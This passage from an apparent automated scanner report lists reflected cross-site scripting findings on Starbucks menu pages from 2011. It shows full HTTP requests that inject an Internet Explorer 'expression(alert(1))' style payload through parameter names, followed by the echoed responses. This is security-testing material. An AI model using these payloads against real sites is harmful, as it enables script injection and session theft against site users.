This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee?68dcf"style%3d"x%3aexpression(alert(1))"65b8aeb2cb6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:12 GMT
Connection: close
Content-Length: 45045

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee?68dcf"style="x:expression(alert(1))"65b8aeb2cb6=1"/>
...[SNIP]...

1.769. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed35a"style%3d"x%3aexpression(alert(1))"d1c3ede59d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed35a"style="x:expression(alert(1))"d1c3ede59d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee?ed35a"style%3d"x%3aexpression(alert(1))"d1c3ede59d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:17 GMT
Connection: close
Content-Length: 45258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee?ed35a"style="x:expression(alert(1))"d1c3ede59d9=1"/>
...[SNIP]...

1.770. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec96"style%3d"x%3aexpression(alert(1))"349c64eee81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cec96"style="x:expression(alert(1))"349c64eee81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee?cec96"style%3d"x%3aexpression(alert(1))"349c64eee81=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:56 GMT
Connection: close
Content-Length: 45212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee?cec96"style="x:expression(alert(1))"349c64eee81=1"/>
...[SNIP]...

1.771. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71256"style%3d"x%3aexpression(alert(1))"331875fd0d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71256"style="x:expression(alert(1))"331875fd0d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage?71256"style%3d"x%3aexpression(alert(1))"331875fd0d7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:42 GMT
Connection: close
Content-Length: 43744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage?71256"style="x:expression(alert(1))"331875fd0d7=1"/>
...[SNIP]...

1.772. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cee5"style%3d"x%3aexpression(alert(1))"c50edecec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2cee5"style="x:expression(alert(1))"c50edecec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage?2cee5"style%3d"x%3aexpression(alert(1))"c50edecec=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:01 GMT
Connection: close
Content-Length: 42963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage?2cee5"style="x:expression(alert(1))"c50edecec=1"/>
...[SNIP]...

1.773. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ebb"style%3d"x%3aexpression(alert(1))"f3fa25f47de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13ebb"style="x:expression(alert(1))"f3fa25f47de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage?13ebb"style%3d"x%3aexpression(alert(1))"f3fa25f47de=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:39 GMT
Connection: close
Content-Length: 45020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage?13ebb"style="x:expression(alert(1))"f3fa25f47de=1"/>
...[SNIP]...

1.774. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2a77"style%3d"x%3aexpression(alert(1))"08cacbe5b0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2a77"style="x:expression(alert(1))"08cacbe5b0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage?b2a77"style%3d"x%3aexpression(alert(1))"08cacbe5b0f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:40 GMT
Connection: close
Content-Length: 45296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage?b2a77"style="x:expression(alert(1))"08cacbe5b0f=1"/>
...[SNIP]...

1.775. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e6e"style%3d"x%3aexpression(alert(1))"257fad08362 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98e6e"style="x:expression(alert(1))"257fad08362 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage?98e6e"style%3d"x%3aexpression(alert(1))"257fad08362=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:37 GMT
Connection: close
Content-Length: 43317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage?98e6e"style="x:expression(alert(1))"257fad08362=1"/>
...[SNIP]...

1.776. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e66f5"style%3d"x%3aexpression(alert(1))"08de845d79f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e66f5"style="x:expression(alert(1))"08de845d79f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage?e66f5"style%3d"x%3aexpression(alert(1))"08de845d79f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:46 GMT
Connection: close
Content-Length: 44708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage?e66f5"style="x:expression(alert(1))"08de845d79f=1"/>
...[SNIP]...

1.777. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ca72"style%3d"x%3aexpression(alert(1))"9fca5104888 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ca72"style="x:expression(alert(1))"9fca5104888 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme?6ca72"style%3d"x%3aexpression(alert(1))"9fca5104888=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:32 GMT
Connection: close
Content-Length: 45465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme?6ca72"style="x:expression(alert(1))"9fca5104888=1"/>
...[SNIP]...

1.778. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e85c"style%3d"x%3aexpression(alert(1))"331368f0807 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e85c"style="x:expression(alert(1))"331368f0807 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage?4e85c"style%3d"x%3aexpression(alert(1))"331368f0807=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:03 GMT
Connection: close
Content-Length: 45253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage?4e85c"style="x:expression(alert(1))"331368f0807=1"/>
...[SNIP]...

1.779. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b41a"style%3d"x%3aexpression(alert(1))"7c9d6c61240 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5b41a"style="x:expression(alert(1))"7c9d6c61240 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage?5b41a"style%3d"x%3aexpression(alert(1))"7c9d6c61240=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:43 GMT
Connection: close
Content-Length: 45282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage?5b41a"style="x:expression(alert(1))"7c9d6c61240=1"/>
...[SNIP]...

1.780. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a8c8"style%3d"x%3aexpression(alert(1))"fd9920fedb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a8c8"style="x:expression(alert(1))"fd9920fedb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme?1a8c8"style%3d"x%3aexpression(alert(1))"fd9920fedb7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:59 GMT
Connection: close
Content-Length: 45430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme?1a8c8"style="x:expression(alert(1))"fd9920fedb7=1"/>
...[SNIP]...

1.781. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5ef7"style%3d"x%3aexpression(alert(1))"69f7e0c5087 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5ef7"style="x:expression(alert(1))"69f7e0c5087 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

